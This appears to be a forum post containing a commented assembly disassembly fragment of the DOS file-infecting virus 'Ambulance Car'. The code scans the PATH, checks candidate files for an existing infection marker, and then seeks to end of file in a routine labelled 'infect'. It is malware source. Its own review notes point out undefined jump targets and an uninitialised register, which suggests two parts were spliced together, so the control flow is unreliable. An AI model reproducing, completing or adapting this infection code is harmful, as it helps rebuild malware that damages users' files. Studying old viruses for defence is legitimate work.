
.

1名無しSISTERさん:2009/08/24(月) 10:57:27
; ---------------------------------------------------------------------
; loadpath -- fragment of a commented disassembly of the DOS file
; infector that the original annotations call "Ambulance Car".
; 16-bit real-mode code, MASM-style syntax.
;
; Original annotator's summary of the routine: it checks for the ASCII
; path string in the environment block referenced from the program
; segment prefix (psp_envirn_seg). If the string exists, the entire
; string is copied into a buffer using '/' and ';' as cues, the DTA is
; set to a directory found in the path and a simple file search is run;
; if that is unproductive the path is searched recursively before
; defaulting to the current directory. Only the scan for the string is
; visible in this listing; the copy, DTA and search steps are not.
;
; NOTE(review): the listing is incomplete. loc_9 and close are jump
; targets that are never defined here, there is no endp, and the code
; from loc_8 onward compares ax without loading it first, so it looks
; like a later part of the disassembly was joined on at loc_8 --
; confirm against a full listing before relying on the control flow.
;
; In:  ds = segment holding psp_envirn_seg; si = base used for every
;      [si+...] operand (its value is set outside this listing).
; DOS calls: int 21h AX=4200h (seek from start), AH=3Fh (read),
;      AX=4202h (seek from end).
; ---------------------------------------------------------------------
loadpath proc near
mov ax,ds:psp_envirn_seg ; ax = environment segment value stored at psp_envirn_seg
mov es,ax ; es = environment block, scanned below
push ds ; keep the program's ds while ds is borrowed
mov ax,40h ; segment 0040h (BIOS data area)
mov ds,ax
mov bp,ds:data_3e ; bp = word at 0040h:data_3e (offset not shown in this listing)
pop ds ; restore the program's ds
test bp,3 ; are the low two bits of bp both zero?
jz loc_8 ; yes: skip the environment scan entirely
xor bx,bx ; bx = byte offset into the environment block, from 0
loc_6: ; scan loop: examine the word at es:[bx]
mov ax,es:[bx]
cmp ax,4150h ; 'P','A' stored as a little-endian word
jne loc_7
cmp word ptr es:[bx+2],4854h ; next word is 'T','H' -> "PATH"
je loc_9 ; "PATH" found; loc_9 is not part of this listing
loc_7:
inc bx ; advance one byte, so every byte offset is tried
or ax,ax ; was the word just examined zero?
jnz loc_6 ; no: keep scanning; a zero word ends the scan
loc_8:
lea di,[si+428h] ; di = si+428h (its use is not visible in this listing)
mov cx,data_15[si]
cmp ax,word ptr ds:[100h][si] ; NOTE(review): ax is not loaded on this path (it holds 40h or the zero word that ended the scan); the same check further down loads data_13 first
jne infect ; mismatch: go to the infect path
mov al,byte ptr ds:[414h][si] ; presumably the first byte read from the candidate file -- TODO confirm
cmp al,0E9h ; 0E9h is the opcode of a near JMP with a 16-bit displacement
jne infect ; original note: if not equal, assume virus not here - infect
mov dx,word ptr ds:[415h][si] ; word following that byte (the JMP displacement when the byte is 0E9h)
mov bx,word ptr ds:[417h][si] ; file handle, per the original note below
add dx,3 ; add the 3-byte length of the JMP: dx = file offset of the jump target, assuming these bytes came from file offset 0
xor cx,cx ; high word of the seek offset = 0
mov ax,4200h ; DOS seek, origin = start of file
int 21h ; file pointer = CX:DX from the start of the file, i.e. offset dx, not offset 0
; bx contains the handle

mov bx,word ptr ds:[417h][si] ; reload the file handle
mov cx,6 ; byte count
lea dx,[si+41Ch] ; ds:dx = destination buffer at si+41Ch
mov ah,3Fh ; DOS read from handle
int 21h ; read 6 bytes at the current file position

; ds:dx points to buffer
mov ax,data_13[si] ; three words, presumably the six bytes just read -- TODO confirm data_13 is at si+41Ch
mov bx,data_14[si]
mov cx,data_15[si]
cmp ax,word ptr ds:[100h][si] ; first word against the word at [si+100h]
jne infect ; jump if not equal to infect
cmp bx,data_5[si] ; second word against data_5
jne infect ; jump if not equal
cmp cx,data_7[si] ; third word against data_7
je close ; all three match: original note treats the file as already carrying the code; close is not part of this listing
infect: ; reached when any of the checks above fails
mov bx,word ptr ds:[417h][si] ; reload the file handle (bx was overwritten by data_14 above)
xor cx,cx ; seek offset high word = 0
xor dx,dx ; seek offset low word = 0
mov ax,4202h ; DOS seek, origin = end of file
int 21h ; file pointer = end of file
; bx contains file handle

